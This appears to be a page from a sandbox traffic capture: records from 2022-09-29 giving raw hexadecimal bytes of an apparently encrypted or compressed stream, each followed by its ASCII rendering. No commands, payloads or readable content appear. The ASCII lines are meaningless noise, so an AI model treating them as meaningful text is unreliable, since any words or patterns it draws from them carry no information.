                                                                                                                                                            2022-09-29 12:45:15 UTC22053INData Raw: 8e 83 4d a3 66 c8 80 c5 a1 85 8b b5 a6 55 9a 5a ff 85 2d 0f 1d 3c de dd 0c 52 c2 51 69 da dc bc e8 f1 b9 86 69 18 5d 07 ac 50 de ef 8e f9 6c 92 ed 2a 8e ed ca 35 2c 31 f9 ac 11 0e 60 ff 7f 94 39 64 ff fc 61 e2 09 c3 f7 b9 63 98 55 17 06 29 31 d1 2f 7a db 34 33 b9 53 7b d9 2e fa 43 94 01 dc 6d 3e 0b 36 01 79 e2 61 20 86 3d 82 c0 d0 40 af 80 06 c1 69 2e f6 d6 52 d2 f3 78 ec 6f d3 d2 b4 11 8d 7b 31 89 89 4c a8 99 a5 13 76 76 34 26 97 e7 13 3e d3 4a 6e 48 58 c1 2b 78 ec 4d 52 d8 b3 dd b5 fc fa 90 9d 32 6a 4a c8 6c 0a 9e ea c2 6a 96 ac bb 7d 38 0d 0f 09 9f b5 86 7d 70 19 e8 e6 0a ad 14 6f 8b f3 53 b1 e8 ab 6c 73 42 67 a0 15 43 7d 07 0c 48 1e 3b 32 62 80 6a 19 26 9d ad 8f 71 58 f8 bd 49 82 91 62 a5 26 7d ae ac 20 90 59 d0 9f 3d 1f c0 b2 b6 30 2c 48 58 c7 09 0f
                                                                                                                                                            Data Ascii: MfUZ-<RQii]Pl*5,1`9dacU)1/z43S{.Cm>6ya =@i.Rxo{1Lvv4&>JnHX+xMR2jJlj}8}poSlsBgC}H;2bj&qXIb&} Y=0,HX
                                                                                                                                                            2022-09-29 12:45:15 UTC22069INData Raw: 1d d4 16 22 64 fb 44 6d 6a 8a 41 4b e5 f4 f1 c8 14 e8 6b bd 37 1a db a3 48 4f 1e c1 86 5f 8a 68 d2 9e ae ba c0 a2 e1 8f fd eb cd 95 ac 5b f7 d3 d7 58 5a 13 1f 91 ce 8b da b0 14 71 4a a9 07 58 b7 bf 0c 09 2a fa fc e2 c7 a4 58 9d 82 e5 1d 56 a0 37 5a 4c 16 56 2e 8e af d0 93 62 eb d7 49 37 f9 85 3a 33 c6 3a ff d0 c6 52 a5 62 c3 97 a4 ba a2 99 b6 da 77 46 95 e4 24 70 2b cb a5 07 6f cd 84 41 58 b8 4d 38 36 c8 c4 c9 40 a1 75 fa dd e3 d2 79 c1 d8 c0 20 5f ae d2 a5 02 de 17 9f d1 79 a7 e2 c6 0c de f3 da af d5 e0 8d d2 b3 26 60 8b 50 86 2c 33 af df 9c 68 80 e4 50 71 6b 0e 90 99 02 b7 cf 01 78 61 42 1b ba 49 78 89 a1 58 44 88 73 85 bd 43 75 9c 4f 01 f8 b5 da 94 10 31 78 3f c0 e7 6a f8 cc 25 b5 8e 82 cc 32 11 27 ce ec 04 85 84 98 c1 56 d8 71 49 08 d1 bd 46 73 80 84
                                                                                                                                                            Data Ascii: "dDmjAKk7HO_h[XZqJX*XV7ZLV.bI7:3:RbwF$p+oAXM86@uy _y&`P,3hPqkxaBIxXDsCuO1x?j%2'VqIFs
                                                                                                                                                            2022-09-29 12:45:15 UTC22085INData Raw: 0e ca 11 4c 8c 09 0d 69 b0 6a 7d 2f 8e 45 fe 13 e9 42 1f c0 07 79 1d 43 7a 25 7b 9d 06 cc 25 c5 19 10 e5 ad 31 e5 a5 79 d2 7d 43 15 be 39 54 20 39 52 4c e5 98 d7 7a b2 96 1b ba fd 40 e4 be 9c 74 d2 21 83 91 51 94 60 2d 62 bf 97 f1 84 b4 de 54 75 9b f9 ac c5 73 ec e8 06 3d 6a fa d9 47 48 65 e6 4f 7e 89 1b d2 08 c2 c3 84 3e 25 3a bd 0c f3 c2 69 13 2e 86 2d 5a 16 ad 44 12 c2 f1 de 38 0e 22 ed a7 b7 9b 91 45 63 51 be c4 b2 b3 2b 2f a2 02 a7 fa 6a 6b 0c d4 68 de 39 b6 52 3a 8e bd 0b b0 f7 06 e2 06 bd 8a 92 b6 81 6d 34 ef 3e b1 25 b3 f9 37 d9 e5 82 40 db 03 30 c3 47 8a 98 45 e3 57 a0 97 19 8d 6d fb d0 0c 7b 9f 28 95 5a da 73 13 41 48 78 fe f5 25 8f 8d 02 ae 9f 37 f5 83 55 61 1e 62 94 f2 5e f3 54 d3 55 53 c8 40 27 1b ba 7c 61 1a 37 ac 35 3e 7a ec 90 94 93 7e 1d
                                                                                                                                                            Data Ascii: Lij}/EByCz%{%1y}C9T 9RLz@t!Q`-bTus=jGHeO~>%:i.-ZD8"EcQ+/jkh9R:m4>%7@0GEWm{(ZsAHx%7Uab^TUS@'|a75>z~
                                                                                                                                                            2022-09-29 12:45:15 UTC22101INData Raw: 8f 88 e8 1c 7e 2e f2 a1 23 94 8a b3 8e 29 7a ad fb 4f c7 a4 6f 2f 2e 40 ae f4 94 3c ff f5 45 29 0f c1 3c f2 31 c8 e4 3c 12 a4 32 60 29 e7 21 23 ca d1 f6 ea 8c 6b 93 3b f1 fa 7e 52 5a 41 ce 0f c0 b2 96 d7 f6 b3 0a d6 07 08 77 d2 49 7e 57 f7 a8 a1 3f 1d 0d 23 e3 35 8e 9e a2 5d e0 00 7c 17 08 d6 49 d9 ff ce 93 c5 fa 4b ac 47 d8 21 fa 7c fd 3f f6 2b e0 8c bf 88 14 46 7e ab 88 f2 0a a8 60 32 16 0c 1b b8 f7 2c a7 b7 bd 61 9b a9 9a 96 99 6f 5f ff 1d 79 01 33 37 13 8b 06 4b c1 e8 71 39 e2 85 18 0d 65 58 de ac 5f 99 14 03 9a 44 d9 a0 78 40 9e fb 0b 0f 43 04 c8 b7 7e c0 91 55 03 ac 3d 41 1e 80 e9 c3 6d 14 3b 27 95 81 6c 6a a1 68 5a b0 92 43 3d 4a fa cf fc 39 00 eb 50 3d 7a ae 23 44 4e 61 91 bf 62 d3 a8 72 4e a8 40 f6 c2 18 82 49 7a 55 c7 aa bd ae 89 cf 0f e6 b9 6c
                                                                                                                                                            Data Ascii: ~.#)zOo/.@<E)<1<2`)!#k;~RZAwI~W?#5]|IKG!|?+F~`2,ao_y37Kq9eX_Dx@C~U=Am;'ljhZC=J9P=z#DNabrN@IzUl
                                                                                                                                                            2022-09-29 12:45:15 UTC22117INData Raw: 0e 02 e4 db 40 e7 62 9e 11 f2 c3 8f 8e bb 3e 08 47 11 22 77 91 56 2a 57 32 2a d0 39 8a e4 01 98 8d e5 93 22 ff 91 07 b5 1c de af bc 7e ff 4a e1 8d 97 f4 02 25 e9 25 f4 b9 83 83 fe 37 c9 55 fc 6f 37 a9 71 06 3f 84 fd b3 03 be fc b0 c8 91 8b b8 a4 2b d8 6a 5a 95 37 02 b2 6e 20 29 c6 43 33 0f 3b 3d eb 38 87 af 81 3a 2b c6 8b 73 a7 08 e4 cf da 9a f6 f3 b0 bc 1f c7 97 02 d9 74 95 8d 97 69 bb 34 78 b7 a5 f0 ff 34 c5 7b d5 95 de fd d6 4b 39 0f 73 b5 45 fb 5c ee 08 9a 8a 3a 6c 9f e9 7e 8a 89 c5 30 de 0e 7a aa bc 86 6c 1f 6f e8 b1 97 1a 67 fd 6a 60 b3 66 66 21 af f5 ce 22 ff 5c 6b 59 51 3e 9f 18 87 d1 91 52 a4 73 16 f6 ff e0 4b 0f b5 6a c1 8d ca a6 3e f6 40 e5 31 89 3b 32 c8 e5 c2 ec ba 49 7b 89 f5 ad cc 59 c7 cb eb 52 86 6d 23 56 0a c5 3e 63 d1 3c b0 64 fe 1a e0
                                                                                                                                                            Data Ascii: @b>G"wV*W2*9"~J%%7Uo7q?+jZ7n )C3;=8:+sti4x4{K9sE\:l~0zlogj`ff!"\kYQ>RsKj>@1;2I{YRm#V>c<d
                                                                                                                                                            2022-09-29 12:45:15 UTC22133INData Raw: 8f 0b 1f 2a c2 7f 6c ab f8 02 24 1b 1e 94 81 be 4b b5 f7 ec 8a 2f b7 f6 9b c3 37 ef 7e 09 41 4e 5f e9 89 40 2f c7 6e e8 d1 b1 ad 79 87 55 87 01 98 9d 2e d1 41 e3 3e 8d fe 15 82 41 b0 db 9a a5 ec 49 2a ee 50 1f da f1 a8 a6 f6 c0 e0 bd 18 0f 40 7c 27 31 2a 14 bb f7 36 b3 bf c4 87 ed 12 1f 99 51 81 d9 07 5d 2b 02 d1 5d 26 05 99 44 be 76 f7 8c 0f d7 c1 98 94 50 dd ec 3a c0 79 b9 d9 5a 76 69 fa c1 c2 76 cc f6 58 71 f7 1b bd 8b 1c d5 d4 d3 41 d3 96 5a 25 fc f7 00 20 50 c8 d5 2b 46 64 f0 96 67 5c ee 77 91 49 8b 0d cb 77 5a 17 46 5b fb fa 6a f5 5b e3 41 28 04 50 53 e6 a6 ff d3 a4 c9 7a 8d e1 3c 8c 0c d0 d9 09 ee b6 31 42 2a c1 70 78 55 53 e5 be 88 f8 0b 64 55 34 69 ff 1b 15 f9 7c 05 59 b1 06 72 01 27 5e 0d 60 4e 9b 5d 44 85 87 ce eb d7 2f 1b ef 88 b0 bb 5e e1 68
                                                                                                                                                            Data Ascii: *l$K/7~AN_@/nyU.A>AI*P@|'1*6Q]+]&DvP:yZvivXqAZ% P+Fdg\wIwZF[j[A(PSz<1B*pxUSdU4i|Yr'^`N]D/^h
                                                                                                                                                            2022-09-29 12:45:15 UTC22149INData Raw: 5c 46 a1 b5 c6 de 06 11 4d b6 82 6a e6 b9 28 91 5d 29 a4 c7 af f8 ed 39 c5 21 01 6f 05 4b 3e a8 50 6e 06 f7 6c 62 dc f5 7e a6 dc c1 c1 91 71 40 3a e9 0c 45 40 c3 5c 7c b9 47 b2 a7 ce 0c 05 a9 3f 72 c8 da ed 67 98 ea 3c bf 8f 2f 2c d2 91 30 a1 28 8c 24 bf 2e 27 a5 f5 fd 77 4d de cf 8f 22 ef 7d 04 09 e0 e4 8e 01 bf 12 9e ef 7b a9 71 0f f6 08 54 5c 46 62 18 68 83 df 30 42 0d 6a ce 59 7b 45 99 0a 10 bd c5 da d5 bd 70 22 b0 c9 a9 35 a9 ba d9 fc 62 55 31 67 3e f1 42 81 04 6c f5 3b 14 fd ce 98 73 18 95 6f 55 71 bb 66 37 1c 19 e9 b7 08 49 ee 45 b5 6d 4e de 74 ac fa 50 7e c3 8f e1 a9 c9 7e af 5b 2f 91 8a 25 35 c7 b4 e9 62 36 36 0a 05 89 3b dd 00 7d a7 cd 45 f7 ed 3e 03 72 f0 fb 15 18 61 54 30 0a 5d c6 e9 35 3f 28 45 d3 a8 95 c3 fe 3c 61 26 c3 ad ce 64 d8 58 4a e8
                                                                                                                                                            Data Ascii: \FMj(])9!oK>Pnlb~q@:E@\|G?rg</,0($.'wM"}{qT\Fbh0BjY{Ep"5bU1g>Bl;soUqf7IEmNtP~~[/%5b66;}E>raT0]5?(E<a&dXJ
                                                                                                                                                            2022-09-29 12:45:15 UTC22165INData Raw: b4 67 54 f0 5b 0f 19 ee e9 6e 9b 53 48 cb 74 eb 0f 3f cf 1a 50 0a 33 ae b4 3c 34 87 c4 0e fa 2e 46 9a 33 c8 d0 57 0d 7f b9 e8 cc 81 4f bf 35 8e e2 dc 3b fd 54 e9 4d 63 69 a1 04 24 19 1e 58 3b 34 95 d9 b5 4d 46 32 c0 76 a4 73 f4 2e ca 50 5e 8b 93 18 f5 ac 64 8a c2 31 05 a2 9a 1b fa f8 fa 20 a5 5b cc a5 8e 3d 4d cd e6 4d 52 02 d6 a4 86 4c a0 91 ef 19 08 71 32 38 05 cd 40 c8 f3 9b a0 44 e8 4e b1 28 ee 55 b7 9b 5e 2f 92 f2 2c dd 12 5d d8 21 81 11 d3 75 02 1c dc e1 32 25 78 f3 b8 44 3c 1e 54 f6 d0 d1 26 75 05 4e 79 cf 1a b8 f8 a1 1c 3a 40 99 2f b5 28 ef eb 4b 5e d4 0a 10 6b 0e 50 38 bf 9a 36 e7 12 af ea 4d eb 04 46 f0 e2 91 30 1d a4 17 7c 26 c5 95 94 7b 26 2f a3 ba d2 6e ca da ed e7 af ad 08 d4 9e eb 44 0a 63 dc 09 44 c8 e6 d3 85 ec f0 f8 df 97 43 68 d0 ec 57
                                                                                                                                                            Data Ascii: gT[nSHt?P3<4.F3WO5;TMci$X;4MF2vs.P^d1 [=MMRLq28@DN(U^/,]!u2%xD<T&uNy:@/(K^kP86MF0|&{&/nDcDChW
                                                                                                                                                            2022-09-29 12:45:15 UTC22181INData Raw: 51 2a 4c 11 61 7f 7b 05 3b 34 e4 b3 ab 09 8f c4 3e ee 79 55 a3 c9 87 71 2d 1c 6a ba de 96 2c 9b 1b 00 d4 b3 fc 52 21 24 f3 41 24 02 f0 6d f8 2d c8 6a cd 3b a8 19 11 c7 6a de 2b 8c 9d ed b6 e6 d8 8e 08 b1 0a 29 05 dd ad 28 dc dd 61 ee 59 f9 38 f8 4b 18 c1 52 a9 4a 58 6b a1 3b 03 14 67 91 83 64 5c 5f 19 d4 55 3a df 53 7b 80 ec 89 89 01 52 f3 02 8d 34 fb 94 f6 76 8a 7c b8 71 87 57 05 0d 8e 57 f2 12 2a 15 1b b5 85 1b 81 93 9f f5 85 39 41 6d 0b 39 4c bb ac 3c 40 28 e1 11 cb 17 7c f6 e5 6b ff fb 07 c5 e7 59 52 6a 73 2d b8 fd 12 22 43 4b 36 46 f4 dd 0d 14 1d 0e 83 87 0a 21 08 42 d2 a0 25 18 9e a4 50 8d 59 58 8b a7 39 81 d5 2d fb 1e ca d1 65 e6 17 a0 8d 72 14 ce 2b f2 49 01 73 42 3d b7 dd a8 13 a4 9f 0b 17 16 8f b9 9f a8 c4 12 fe 99 0a 6a 64 3d 42 80 b5 be 88 1f
                                                                                                                                                            Data Ascii: Q*La{;4>yUq-j,R!$A$m-j;j+)(aY8KRJXk;gd\_U:S{R4v|qWW*9Am9L<@(|kYRjs-"CK6F!B%PYX9-er+IsB=jd=B
                                                                                                                                                            2022-09-29 12:45:15 UTC22197INData Raw: 86 0c 56 94 61 a9 da 2e 40 53 09 10 b0 a0 66 3f fb 79 2b 33 2f 25 cf 73 9f f8 ce de 6f a2 14 43 c3 89 28 db 13 1b a0 8a 61 1e 4f 55 46 cd 63 5d 4b a4 f1 6c f4 40 21 14 c3 3a d7 f3 a5 5e f3 67 bb b8 47 8e 44 c9 c1 c2 ad b3 df 58 60 98 c2 de 47 fb 2a f2 3a 6e 45 ae fb 89 82 73 0e 3b bb 49 e0 44 a3 8a 89 9d dd 9e 58 c7 7e b2 64 f2 ac 92 56 02 80 d2 a2 cb 46 38 21 f4 5d 71 cc f0 20 82 02 1f ee 54 09 15 9f e0 ec 26 9b 9f 75 ce 66 e3 22 ac f6 f6 5a b1 a9 a4 fc 09 4f 88 b5 61 49 2b 7a e2 8f ab c4 f9 11 a7 b6 c7 79 96 ff 2e af c9 d6 ef 48 21 ca 32 34 14 36 6e c5 96 38 34 50 2b e1 48 2a f8 e5 e5 cd 3f 4b 80 95 fd ff f6 8d 82 84 30 0e e7 59 e3 b6 44 9a 5d 2d a1 b4 0b 95 26 c6 7e bf 38 61 1a a8 47 40 56 15 5f 1a eb 21 b4 e4 ed a2 4f b1 80 23 62 e3 ba 2f 5c e2 eb 90
                                                                                                                                                            Data Ascii: Va.@Sf?y+3/%soC(aOUFc]Kl@!:^gGDX`G*:nEs;IDX~dVF8!]q T&uf"ZOaI+zy.H!246n84P+H*?K0YD]-&~8aG@V_!O#b/\
                                                                                                                                                            2022-09-29 12:45:15 UTC22213INData Raw: 74 40 db 5d 81 fb 1a 73 35 2f ba 50 f9 37 96 6a c2 ac 00 d8 f2 05 47 46 13 c0 74 a2 ec 99 de d3 bb d3 af cf 6a 27 35 75 bb 22 43 62 2c d2 2d 65 ac a5 d4 ca b4 b3 93 df 84 d6 67 02 77 58 2b 79 5d 59 c7 c7 04 e5 88 11 ac 8e 43 5b 29 d5 cd 7f 2c ec 13 e4 34 2b 5e b6 f2 de f5 6f 18 43 aa 3f ac 48 bc c7 92 3e d4 ab 6f a7 a2 b0 d0 3a 91 2f 67 ed 15 17 20 25 82 ec d8 e7 08 1a d7 67 dd dd a2 98 2e 3f 96 c1 fc fc 04 ea 82 45 e8 ed 06 ce f6 5a 5b f1 3e 6d c9 c4 b0 7f 7d b4 8a 1d 62 9f 63 76 0d e5 c6 8a 0f 23 ce 09 a8 f4 b4 be 80 9d 96 41 9a 7e c1 01 0a 65 1c 6b f9 bf 22 42 dd b5 09 8f 1c 9f 62 27 47 eb 0b 7a f9 31 f4 77 53 0d dd 81 78 38 ed d5 94 1f b7 90 36 e3 22 ea 39 c2 d9 27 97 cc 92 e0 ef 7c 01 12 b1 1a e8 54 da cc fc 0a 83 29 18 09 1d f2 a0 9f c5 be 4f 95 91
                                                                                                                                                            Data Ascii: t@]s5/P7jGFtj'5u"Cb,-egwX+y]YC[),4+^oC?H>o:/g %g.?EZ[>m}bcv#A~ek"Bb'Gz1wSx86"9'|T)O
                                                                                                                                                            2022-09-29 12:45:15 UTC22229INData Raw: 90 33 67 f9 56 da f9 f3 d6 f6 c3 8c cc f0 c5 bf 4f 0d ac 34 d8 72 3d f6 12 73 df cd 2e f4 87 29 a3 14 71 27 6f dc d3 b3 aa 24 47 47 1d 0b e1 5e 79 d7 2e e6 8f 4c 80 7e a7 e4 35 ac ae c7 db 9a b8 b4 81 07 60 0e 9c 16 c5 8c 59 b2 cc 6f 45 d2 b5 8b 92 cb 38 f5 75 54 e3 02 94 b8 5f aa 31 60 9e 41 b8 4b 0d 14 61 0f a6 bc 61 0c 9a 9d f9 34 22 30 a4 c4 b1 59 8a 3f 3c 1a b9 a7 a2 17 10 a3 8e 5f 5b 52 c7 d7 fc 0e 22 50 a8 dd 6b af 19 64 35 f7 ac 59 88 10 27 e8 2f 0e 81 38 f3 f6 31 f9 d0 d0 67 5a e8 c6 38 7b 40 81 d8 df 56 c8 26 9f ae 88 a1 a6 a5 36 36 db db 12 a8 26 d2 ca 84 5c 16 89 93 01 9f 69 ee 8f ed ec 63 6c c0 33 34 59 48 ba 77 01 6d 76 6a ba c7 af 72 54 ab a7 d8 c8 e9 85 37 39 45 69 5e cd 14 66 3b eb 66 9a 7f d9 8b 60 9b 94 cb 68 5c 2e c9 7d b1 46 22 58 5b
                                                                                                                                                            Data Ascii: 3gVO4r=s.)q'o$GG^y.L~5`YoE8uT_1`AKaa4"0Y?<_[R"Pkd5Y'/81gZ8{@V&66&\icl34YHwmvjrT79Ei^f;f`h\.}F"X[
                                                                                                                                                            2022-09-29 12:45:15 UTC22245INData Raw: ed 1a 14 ad 33 26 85 ee 8f 50 b1 bb 25 3b eb 42 67 a3 3c 61 f8 eb 0c ec 8b 98 0c 4f ea 51 ff a6 87 fe 37 5e 43 9d a4 5d fa 33 b9 f2 ad e4 04 4c d9 97 05 44 15 25 df c9 72 de 71 8b 48 40 e4 c8 18 a1 b2 2d c0 0a ad f0 4a 29 a7 2d 87 b1 64 b3 e7 56 39 f4 ef 56 6f 74 06 57 d3 45 3d 42 bb a5 8f 1e a9 87 fd f7 67 f7 70 26 e7 f1 09 e0 5a c5 ee 71 d8 4a 0f 97 ed 72 6a fd 60 2d 6f 32 20 43 5d e5 e8 24 f2 da aa db 12 2d 6f 6f 44 b8 49 a1 06 16 87 1d bb ca b0 82 62 53 94 f5 7d e3 21 31 d1 e1 7d 19 2a 3f 5f 16 04 22 05 50 a5 9b c3 64 e4 05 a8 ee c9 18 92 54 71 ff 91 e7 a5 55 10 48 0d 61 c2 f8 e5 6c a4 d9 92 8c 04 b7 2f 58 d1 43 22 9f a2 81 02 0e 91 a5 a4 f2 fb c3 f2 e8 1b f6 e2 c3 1a 2a e4 04 2f b0 92 6a a0 0e 01 15 7c e7 a8 f4 b5 f7 1f 81 51 a1 f1 8a b4 86 1c 59 cb
                                                                                                                                                            Data Ascii: 3&P%;Bg<aOQ7^C]3LD%rqH@-J)-dV9VotWE=Bgp&ZqJrj`-o2 C]$-ooDIbS}!1}*?_"PdTqUHal/XC"*/j|QY
                                                                                                                                                            2022-09-29 12:45:15 UTC22261INData Raw: 9e 35 bc ec 22 e2 b3 b4 ad 9f 39 32 2e a0 e8 0c 5e 6d 28 8e 30 d9 b2 df e5 b5 5f a3 b8 80 ed c7 fd e5 cc 73 cb e3 50 45 97 a7 da 37 f5 09 7c dd b8 f4 4a 15 3b c8 2c 05 a2 ac 29 69 d5 56 60 8f 04 71 7f 26 8a 3b e9 24 3a 45 ea d7 69 41 4d c6 5f fd 59 8c b4 85 4f 0f 57 e1 d7 21 29 53 a1 f6 4a ef d7 fd 83 1d 05 c4 ef 64 25 b4 97 a4 b5 11 10 f0 ea a8 f9 5c e1 06 fb 08 fc 78 ec d2 b7 f4 1e 19 59 91 61 83 69 bf b4 59 07 83 f4 50 87 8a 36 8d fa ed a4 fb 79 40 b7 fb 19 c1 07 2f 25 4d b1 7c d8 78 7e a2 55 88 af d2 34 e9 16 84 3a e8 85 6a 45 3f 02 9f 9b 30 89 ce 82 d8 c0 04 21 92 eb ab 96 86 15 d4 5b 86 89 af 24 73 21 f9 b9 af 63 61 ac 55 3f 27 73 79 13 96 83 ec 7a 6e 4b 42 ee 75 aa 76 88 2b 56 cb 2a 58 10 af e4 44 16 43 94 1d 13 f6 79 6b cf ff c2 1c d9 d2 00 62 95
                                                                                                                                                            Data Ascii: 5"92.^m(0_sPE7|J;,)iV`q&;$:EiAM_YOW!)SJd%\xYaiYP6y@/%M|x~U4:jE?0![$s!caU?'syznKBuv+V*XDCykb
                                                                                                                                                            2022-09-29 12:45:15 UTC22277INData Raw: 3c 78 81 aa d9 89 aa 89 7c d7 25 34 53 e8 e6 e8 ea 53 eb cb d0 4a 57 3a 5d 52 b0 65 8b da 4c b0 f5 52 ef e0 79 3c 83 7c 78 37 78 7f 9f 45 cb b9 1b 90 8d 48 3c 51 47 a1 a3 df 35 08 1b 9f e5 f5 26 d1 ab 39 e8 03 38 cb b4 24 8e 18 56 1f 28 46 86 4c ab c5 45 ef 5f 5d bf 5c 50 48 2d 9c 9f bc 2b 47 7a d3 3d 7f b9 65 8e bd 93 84 5d f9 f3 2f cd 26 f3 b7 db 93 de 1a 7c 79 b5 26 34 11 00 6b 09 76 83 d4 a5 b5 87 0e ed 86 12 41 7e 12 e6 12 74 41 84 ab fe a7 3c 9f 94 bc 32 de 2b 13 d6 e1 9d b7 c6 40 45 65 1e 0a 73 27 ed ed 53 c3 87 1e e7 90 38 3e e0 ea 89 15 67 47 5a ad c7 5c e6 a6 f0 ac 7c c4 d6 86 3b 9b b8 79 ef 1d f5 25 f6 55 ef 50 35 5d 0d e2 51 13 a7 e1 c3 a9 a6 85 d2 d0 77 22 ad b7 ff 7b d4 93 46 7a 86 93 7c 62 fd 36 21 3f fa 94 75 4d 0d 94 90 88 b8 ac f2 33 94
                                                                                                                                                            Data Ascii: <x|%4SSJW:]ReLRy<|x7xEH<QG5&98$V(FLE_]\PH-+Gz=e]/&|y&4kvA~tA<2+@Ees'S8>gGZ\|;y%UP5]Qw"{Fz|b6!?uM3
                                                                                                                                                            2022-09-29 12:45:15 UTC22293INData Raw: 56 e9 42 60 c5 f7 98 64 36 6d 36 26 a2 14 3c f1 c5 b6 ae ab 56 a4 e2 31 af 75 2a a2 c8 05 a3 bf 97 33 7b 78 a2 15 38 6a 5c fc a8 19 a6 43 ef cf 93 58 2f 6f 18 01 75 ba 21 f0 be 9c 0b 63 44 e8 54 ed fc 66 bd 1e 36 e1 9d 85 2c 22 e6 0e 6a 21 70 ac de 98 f1 18 7c 53 e9 26 26 f9 f4 31 ed fa 87 ae 4c b8 64 cc b4 7b 54 cf 6f 7f 2c bd 96 f7 c6 3f 41 f3 b5 a1 3e bd 44 26 5c e0 16 2e ae f1 42 c6 15 82 88 c5 78 75 31 7a 3a 43 7a ab b3 f5 49 30 92 b8 65 96 64 b7 06 20 e7 2d d9 d5 5d 96 6a ee 38 7f 9f b1 81 8b 0f cd c3 25 93 31 24 ee 44 e1 7c 70 02 4a 80 b6 73 2e f4 99 cd bc 9b e1 3a 1f 95 a8 b4 c9 93 fe f6 41 a3 fa 26 87 17 fc eb 9a 63 45 58 61 7c 63 0f e4 95 36 a6 ed 6c ce b2 d0 74 eb 0a 9e 56 bf 07 a8 bc 67 72 9c 81 d0 d4 34 36 e6 cd 10 ac 76 89 2c ba 2a 46 30 6e
                                                                                                                                                            Data Ascii: VB`d6m6&<V1u*3{x8j\CX/ou!cDTf6,"j!p|S&&1Ld{To,?A>D&\.Bxu1z:CzI0ed -]j8%1$D|pJs.:A&cEXa|c6ltVgr46v,*F0n
                                                                                                                                                            2022-09-29 12:45:15 UTC22309INData Raw: b3 39 ae 2e 35 6d c0 35 fc 7a cc 3b 1c eb 3b 25 ac d2 30 29 b9 cb b8 c3 bb a5 f9 98 a7 b6 34 43 4a fa e7 f7 14 da d5 d4 81 5e ba 21 1b 35 2c 70 05 26 aa 82 ee 22 d5 80 85 41 5d ec 6c 2c 9c a1 e3 d1 48 c2 cb a5 e1 0e 3f 3b 4f b0 66 5d 07 91 81 cc 0d 14 39 d8 09 46 80 66 6a 33 4b ca 39 1c 9c 4a 87 66 be ae 3d 04 34 8d ea d0 d9 8b 96 a0 6c 13 8a 76 e3 f1 e2 5c 55 46 15 c2 35 12 b8 d6 c6 56 91 66 cd 4a d1 46 66 0d 9d 09 96 7b 09 e1 e3 3d 2a 9a ed 3e 2c 6b 91 7f 55 98 47 dd 6f 94 a9 f5 9c 08 ce bb 89 bb 69 1e 0f 1f 71 df f6 19 e2 5c d1 73 40 72 47 cc 8f e0 bb 71 52 5b cf 2e ec d1 18 d9 d9 b5 38 a4 2b 8e fa a5 f3 b3 b6 01 ee 62 86 86 44 87 85 82 4f 65 60 cd 70 2d 8b 72 1b 46 dc 14 07 74 d7 c5 ce df 59 f3 7b b6 e8 73 a8 2f 22 6e 87 21 fa cc 6d 97 c7 46 00 fd 3b
                                                                                                                                                            Data Ascii: 9.5m5z;;%0)4CJ^!5,p&"A]l,H?;Of]9Ffj3K9Jf=4lv\UF5VfJFf{=*>,kUGoiq\s@rGqR[.8+bDOe`p-rFtY{s/"n!mF;
                                                                                                                                                            2022-09-29 12:45:15 UTC22325INData Raw: f0 47 31 0d fd cc 0a 47 60 13 2c cc 71 b6 ab cf 8b 0f c0 c3 e2 30 4c cf 82 fc a3 70 3d c5 1f c3 07 cc 10 43 e6 b0 4f 6e ef e9 67 5a d4 2d 26 f0 f7 b9 bd 82 b1 81 8f e3 ae f6 74 70 7b 99 1d dc b0 7b ee 23 33 93 d6 62 99 99 1b 0e d6 98 75 e9 fe a0 f7 9d 1f 45 3e 36 6d 17 e4 d8 e5 42 e1 c5 73 58 ae 19 df 48 fd 01 67 a2 cb 00 d3 77 50 ee b6 aa 69 33 4e a9 b0 05 f4 22 1e 65 52 e1 b8 82 78 9b b0 8c 5c 9c 68 31 53 51 ef cb ba 73 87 d0 32 b4 30 1b 5e af 08 e0 39 8c 63 a8 5b 19 fb 7a 9a 0b 75 1d 9d e2 56 60 f4 21 a0 7a 2f a4 68 3c 2b 9a 52 d0 6a 0c 4c 50 13 bb e9 c0 32 00 04 f8 81 13 1f 87 be cc 4a 2d 53 36 10 ac af df 29 ac 3b ba 5d 0f 2d b2 e1 2f cd 1f 05 1f 9d 28 b2 c6 a1 73 6f d6 46 bd c9 69 3c de 9c d0 71 24 0d 09 87 21 68 14 99 17 c3 e0 4a 64 8c cd 41 b3 48
                                                                                                                                                            Data Ascii: G1G`,q0Lp=COngZ-&tp{{#3buE>6mBsXHgwPi3N"eRx\h1SQs20^9c[zuV`!z/h<+RjLP2J-S6);]-/(soFi<q$!hJdAH
                                                                                                                                                            2022-09-29 12:45:15 UTC22341INData Raw: 96 49 ec 65 d7 ed c4 5f dd da ba 1d c0 35 b2 7b e5 1b 05 53 29 d1 2d b7 e5 e9 94 e5 60 60 16 58 c7 04 0f 76 ea 6e 04 77 8a c8 43 07 48 79 d3 a7 a4 72 b5 dd f7 95 cd 28 05 0c 27 ec c5 21 40 29 a6 f2 eb a2 1f 71 87 b2 a1 b8 a1 2f 79 af 93 70 81 0b 53 f8 f5 cb a3 9d 94 ac 86 31 a6 1e 68 b1 4f 75 fb 4e 38 b1 b6 cc fb 0d 40 78 5e 1a 60 c0 1b fc ca 9f 90 36 8c 5d a2 bb 04 23 6b 6c 35 bc 31 1a 98 36 a9 45 29 e8 cb bf 6e de c5 69 7d 7e bb 9d e0 34 d2 a0 23 96 d9 e0 50 35 ac 4f 17 6c 8a b9 d1 60 68 4d 2d 31 1e 29 49 df bf 32 5a 27 b6 84 21 89 66 51 33 22 36 58 6f b5 0e 47 8c a8 06 08 55 43 1a b2 8b 31 df 7c f3 f4 45 12 c2 43 e4 3d d6 4d 0f 6c 24 d8 02 a9 30 f2 b7 0d ed c2 f2 d6 7c c6 99 65 73 51 39 ee af ca ed 34 60 68 d6 5d bd 38 a0 88 bc 16 86 69 de fa 70 ee 8f
                                                                                                                                                            Data Ascii: Ie_5{S)-``XvnwCHyr('!@)q/ypS1hOuN8@x^`6]#kl516E)ni}~4#P5Ol`hM-1)I2Z'!fQ3"6XoGUC1|EC=Ml$0|esQ94`h]8ip
